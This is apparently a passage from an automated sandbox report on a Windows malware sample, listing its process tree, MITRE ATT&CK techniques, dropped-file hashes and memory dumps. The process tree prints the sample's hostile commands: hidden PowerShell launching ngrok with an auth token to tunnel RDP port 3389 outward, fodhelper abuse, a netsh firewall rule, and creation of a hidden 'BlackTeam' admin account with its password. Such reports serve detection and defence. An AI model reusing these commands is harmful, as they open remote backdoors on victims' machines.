    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe config add-authtoken 2PDLmCpAc15rqXLc5UciTovK3D0_4ATiYujFG1vzipB7hfDgs
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:804
  - - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
      "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" config add-authtoken 2PDLmCpAc15rqXLc5UciTovK3D0_4ATiYujFG1vzipB7hfDgs
      4⤵
      Executes dropped EXE
      PID:1228
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/ngrok.exe tcp 3389
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:4340
  - - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
      "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
      4⤵
      Executes dropped EXE
      Modifies system certificate store
      PID:556
- C:\Windows\System32\fodhelper.exe
  "C:\Windows\System32\fodhelper.exe"
  2⤵
  PID:3504
- - C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
    "PowerShell.exe" -window hidden -command C:\Users\Admin\AppData\Local\Temp\/vhttd.exe -i
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2188
  - - C:\Users\Admin\AppData\Local\Temp\vhttd.exe
      "C:\Users\Admin\AppData\Local\Temp\vhttd.exe" -i
      4⤵
      Sets DLL path for service in the registry
      Executes dropped EXE
      Modifies WinLogon
      Drops file in System32 directory
      Drops file in Program Files directory
      PID:1040
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        
        PID:4536

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user BlackTeam JesF3301asS /add /active:"yes" /expires:"never" /passwordchg:"NO"
1⤵
PID:556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:4100

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:2036

Network

MITRE ATT&CK Enterprise v6

Initial Access

Replication Through Removable Media

T1091

Execution

Persistence

Account Manipulation

T1098

Hidden Files and Directories

T1158

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Winlogon Helper DLL

T1004

Privilege Escalation

Defense Evasion

Hidden Files and Directories

T1158

Install Root Certificate

T1130

Modify Registry

T1112

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Desktop Protocol

T1076

Replication Through Removable Media

T1091

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\RDP Wrapper\rdpwrap.dll

Filesize
48KB

MD5
678a88c83e62ff5bf041a9ba87243fb4

SHA1
91a3c580f17172ed2c8d419af4b15e2c545d6a72

SHA256
c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

SHA512
5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\PowerShell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
62623d22bd9e037191765d5083ce16a3

SHA1
4a07da6872672f715a4780513d95ed8ddeefd259

SHA256
95d79fd575bbd21540e378fcbc1cd00d16f51af62ce15bae7080bb72c24e2010

SHA512
9a448b7a0d867466c2ea04ab84d2a9485d5fd20ab53b2b854f491831ee3f1d781b94d2635f7b0b35cb9f2d373cd52c67570879a56a42ed66bc9db06962ed4992

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
31c0c40c1b029594f64b4678c33d7505

SHA1
8731098be68cde06a2bf22934273062ca75a68f0

SHA256
380b838f718c79039662b99bff510a0a200ba0c05755f02caa46374380ed7814

SHA512
12dadc04aa9a52b770ee2ed7ce0b4182f6280a713b24259bebbc5274a3e563ff4f25dcd27fb63279c1452543a04d0c60a5e6fd4efdf2f9ddacb211e56ce89e11

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8857491a4a65a9a1d560c4705786a312

SHA1
4f3caf2ad5d66a2410c9cca0381d26a46e832cb4

SHA256
b6e1a16a11075cb4e0bae0cebdb6ac15f5d66e0005f557703708a04cd11bd360

SHA512
d9497c47898cdc4c4fc62158830dc931990e08bb4a28a5d19d4187a87a2afab8a4bd58ca346563210b476c9adb9a714bfe1057e0ebce85d1fd94731be6d02660

Download Submit
C:\Users\Admin\AppData\Local\Temp\Snup.bat

Filesize
1KB

MD5
3bb16d80a3dbf1c6cdb06e52fcaab5ba

SHA1
59ab02029d135f93c5cd2b153d69663e216b1965

SHA256
6ad6b4cf1bc3786ceea552b17b244a49896ee703baf53d4008262790a79c97b5

SHA512
cec268b374ea8b739aaf72708d58bd425b79a411e9241ea6adfa44eb40204ed6ec509609e40b53fb6c468e037bc4b762a38a9160bf5e746c06c622e3fada5dcb

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_010kgb0m.3qw.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngrok.exe

Filesize
20.5MB

MD5
0de87b2cb6b4f4c247d7f28b01f3575a

SHA1
336aec3afaf84c8dc897eea14d207c5240d04312

SHA256
05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

SHA512
5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngrok.exe

Filesize
20.5MB

MD5
0de87b2cb6b4f4c247d7f28b01f3575a

SHA1
336aec3afaf84c8dc897eea14d207c5240d04312

SHA256
05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

SHA512
5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngrok.exe

Filesize
20.5MB

MD5
0de87b2cb6b4f4c247d7f28b01f3575a

SHA1
336aec3afaf84c8dc897eea14d207c5240d04312

SHA256
05596cac3448ed1d0e132c96bd45f02769e08932d4e60be4c918fea9d1064ef7

SHA512
5e2d4e457b0ab97d899e8ee32c1dfc14ef58f8d7578c6268689b91e7efc4aa56d62038976a1085646e436da9f176135f76a1d6498baa29376731e4f9d3996599

Download Submit
C:\Users\Admin\AppData\Local\Temp\vhttd.exe

Filesize
445KB

MD5
2612258ab4e2221b52974b5c0154fffd

SHA1
2aa58664874516b338325d1fd8205421815b2cba

SHA256
833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

SHA512
02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

Download Submit
C:\Users\Admin\AppData\Local\Temp\vhttd.exe

Filesize
445KB

MD5
2612258ab4e2221b52974b5c0154fffd

SHA1
2aa58664874516b338325d1fd8205421815b2cba

SHA256
833d6f4de177cf07ceccbb0ceb910f7785df60941a61c7154ed747ec845f51ae

SHA512
02b000c89fc2f49f55e9ecacd17656cc5fbe948e2717ad4876b98d73ff30182cfa43ed05d0820cc4c427e79d6c7aaabf299a9c24158e34a96ad6008f9521483c

Download Submit
C:\Users\Admin\AppData\Local\hBStbrK.sven\Files\AddUninstall.doc

Filesize
1.8MB

MD5
c8c2145db62b0da530ec4fb213b4724b

SHA1
2ccad633ea95de906d91e3ad49de3cbe5008ac32

SHA256
cf7b6e74f29f1308cc7c800c347fd46c47d2a0a2a6611ae923f975a95536c34c

SHA512
494043dfdcf1e31e83fba2e87a2f720c89037e5f605273474ecc635b3a585264f64801add2d71a2901d6f8a94329619b76567db5ef6545ccf6910f90211d040d

Download Submit
C:\Users\Admin\AppData\Local\hBStbrK.sven\sysInformation.txt

Filesize
810B

MD5
2772f5d7a4164bfeb010a1a52c478156

SHA1
ac4aa98864c8cadcbd71ebecefb489ce558e0c21

SHA256
f5bcd6f68fe88e27829d62ded6002e2043f5a30a022603557bc7677adc9713c6

SHA512
994c6804e3a4921ed1d63a7af2ca7b9807e431cc22ab484de267697b524bc7fec46d93aed466b6a0ed42aa12da6cbf96544e8c94d738724c752f29e9b55d9c1d

Download Submit
C:\Users\Admin\AppData\Local\ngrok\ngrok.yml

Filesize
74B

MD5
137e4380b0434d58f3e5d255cb6d9a4c

SHA1
f1251b3c2956e6f2d595f5fc8f8acd013ab25afb

SHA256
76a103ca670eae88a2b08f9032f14e07b19da2e4ca43ad7e42bd548edfa874ea

SHA512
f179e741d5c6ee6979fc185350f4cd6fdf7996a480b0a05b9ddf401127030e7d8ef31a34dd23a0025eb88a01571809788085391552e5920e4b61700ac5996149

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
c7a0909d184fa37208cc0d5a2b5808f5

SHA1
894181c6f35ea45543528fc0be160a0b1d560fe5

SHA256
a47ca60bd7984ea17ab8cbd7e9a677e1fd8cb8532aaee015ab3cd5d1a8fd2c9a

SHA512
209d0bd6c9486f1faf092d00a9c4cf080b8a320d5b7ea984e2688b2676b75e74330e3ceb3bdad1e44caa77894551d7bd14d0e3d8c945d2e0ae32530716fa94f6

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
83c43783ae29b538708c73b2bf1d6669

SHA1
b946a83ee8a3862eadc3f0f65f5238b129e8e042

SHA256
eb7e88a46607ffe9893793774fa220d4ae9caedc2f33387c73535184248cc5c3

SHA512
ae3897e6777bf9d6e62f91c52714a232cdc0633b39a44a88aecfed06460cf392b85778f19b534e4bda3d80ecd86577ef52c53c16965721bbe2ece99af0702dba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
83c43783ae29b538708c73b2bf1d6669

SHA1
b946a83ee8a3862eadc3f0f65f5238b129e8e042

SHA256
eb7e88a46607ffe9893793774fa220d4ae9caedc2f33387c73535184248cc5c3

SHA512
ae3897e6777bf9d6e62f91c52714a232cdc0633b39a44a88aecfed06460cf392b85778f19b534e4bda3d80ecd86577ef52c53c16965721bbe2ece99af0702dba

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
1cef66f6f0c692ffdb1a541aef6e38f3

SHA1
f09ad68e3a0e6ded889eebc44934b4117421055c

SHA256
0609d5b8d73851f25b498a83b39deddd58c898a6069d419bbb33237bd4fc58fa

SHA512
70ae343ad08e69baa1e32583db6a3bebbdaa84548f417d501e1f1e341c9afbff387fb0af7cd91977c859faeacdaa3c6888a35c86f202cc93d7f01c54c20a6b97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
1cef66f6f0c692ffdb1a541aef6e38f3

SHA1
f09ad68e3a0e6ded889eebc44934b4117421055c

SHA256
0609d5b8d73851f25b498a83b39deddd58c898a6069d419bbb33237bd4fc58fa

SHA512
70ae343ad08e69baa1e32583db6a3bebbdaa84548f417d501e1f1e341c9afbff387fb0af7cd91977c859faeacdaa3c6888a35c86f202cc93d7f01c54c20a6b97

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
8dc78bd6b79171c60aed428aff326398

SHA1
37eb8e45f644f5679be54d48e14b66166d81a2dc

SHA256
c35e5cd42ceaa7341ccc0709d2d9163cf6829d6652fd65697a9643b38ce61509

SHA512
dfad7e7098ca3cb5bbc66d52dd803d98f632f4a203c67cb8234aaef93e10c81a4e7d1249d2675c7aef3c5324844afc342ab286ed53b0aa6ffdcfa51a9866c17d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
67532fb7d13dcc866f666b51698b502e

SHA1
900a0c230ba6c60b0190927f7900e977c9665928

SHA256
2d69584eaa8e72bb0ddf87caaa55abea19c2c8a48595f76a9fa06b0bc18341fc

SHA512
5e83258f62fca9aa87dc185d3972c245a983d825fbb80f3d322d9623f79b8dab78116599595d551d7c9305d914ce3036a3c58df2d54e22bff60dc6a70d1575c7

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
6KB

MD5
67532fb7d13dcc866f666b51698b502e

SHA1
900a0c230ba6c60b0190927f7900e977c9665928

SHA256
2d69584eaa8e72bb0ddf87caaa55abea19c2c8a48595f76a9fa06b0bc18341fc

SHA512
5e83258f62fca9aa87dc185d3972c245a983d825fbb80f3d322d9623f79b8dab78116599595d551d7c9305d914ce3036a3c58df2d54e22bff60dc6a70d1575c7

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
48KB

MD5
678a88c83e62ff5bf041a9ba87243fb4

SHA1
91a3c580f17172ed2c8d419af4b15e2c545d6a72

SHA256
c9786df320ad6127bece91c530bc6fddfff41286c944fd76d44b60799dbe49b8

SHA512
5392a452aceef18d3edc89c2998692dd73e551ed5c62c481a54daec564312a94fd99cc2dce2fdd18c6b297ff83ecfa181e78574423d008a456a8569f04c7daef

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
338KB

MD5
98082786e440be307873aafea2ea092e

SHA1
089f39ae279fec8fe2bf6d040457e9d3d566f348

SHA256
8de2b36a407ebc818459d6792b3f14cad6372a9c4756eeffeaf8455ccfba16e5

SHA512
2d069b1f6144cba156eb9734b074a8c2bc42bfce14baa622c25c29d5ca81a8bdc6076eb134b0c4eaa99e834a7cae69c69c7a6e88b86e8d5b2afbf58193b908a9

Download Submit
memory/804-218-0x00000222FAB30000-0x00000222FAB40000-memory.dmp

Filesize
64KB

Download
memory/804-219-0x00000222FAB30000-0x00000222FAB40000-memory.dmp

Filesize
64KB

Download
memory/804-220-0x00000222FAB30000-0x00000222FAB40000-memory.dmp

Filesize
64KB

Download
memory/1040-276-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/1040-268-0x0000000000400000-0x0000000000592000-memory.dmp

Filesize
1.6MB

Download
memory/1200-134-0x0000017E283A0000-0x0000017E283B0000-memory.dmp

Filesize
64KB

Download
memory/1200-135-0x0000017E283A0000-0x0000017E283B0000-memory.dmp

Filesize
64KB

Download
memory/1200-136-0x0000017E431C0000-0x0000017E431E2000-memory.dmp

Filesize
136KB

Download
memory/1200-133-0x0000017E27CA0000-0x0000017E27FE6000-memory.dmp

Filesize
3.3MB

Download
memory/2036-275-0x00007FF90E9A0000-0x00007FF90E9C6000-memory.dmp

Filesize
152KB

Download
memory/2188-264-0x000002D619BF0000-0x000002D619C00000-memory.dmp

Filesize
64KB

Download
memory/2188-265-0x000002D619BF0000-0x000002D619C00000-memory.dmp

Filesize
64KB

Download
memory/2356-197-0x0000024773010000-0x0000024773020000-memory.dmp

Filesize
64KB

Download
memory/2356-196-0x0000024773010000-0x0000024773020000-memory.dmp

Filesize
64KB

Download
memory/2356-198-0x0000024773010000-0x0000024773020000-memory.dmp

Filesize
64KB

Download
memory/2888-148-0x00000226D4D70000-0x00000226D4D80000-memory.dmp

Filesize
64KB

Download
memory/2888-151-0x00000226D4D70000-0x00000226D4D80000-memory.dmp

Filesize
64KB

Download
memory/2888-149-0x00000226D4D70000-0x00000226D4D80000-memory.dmp

Filesize
64KB

Download
memory/2888-152-0x00000226D4D70000-0x00000226D4D80000-memory.dmp

Filesize
64KB

Download
memory/4340-245-0x000001FB6EF30000-0x000001FB6EF40000-memory.dmp

Filesize
64KB

Download
memory/4340-244-0x000001FB6EF30000-0x000001FB6EF40000-memory.dmp

Filesize
64KB

Download
memory/4340-243-0x000001FB6EF30000-0x000001FB6EF40000-memory.dmp

Filesize
64KB

Download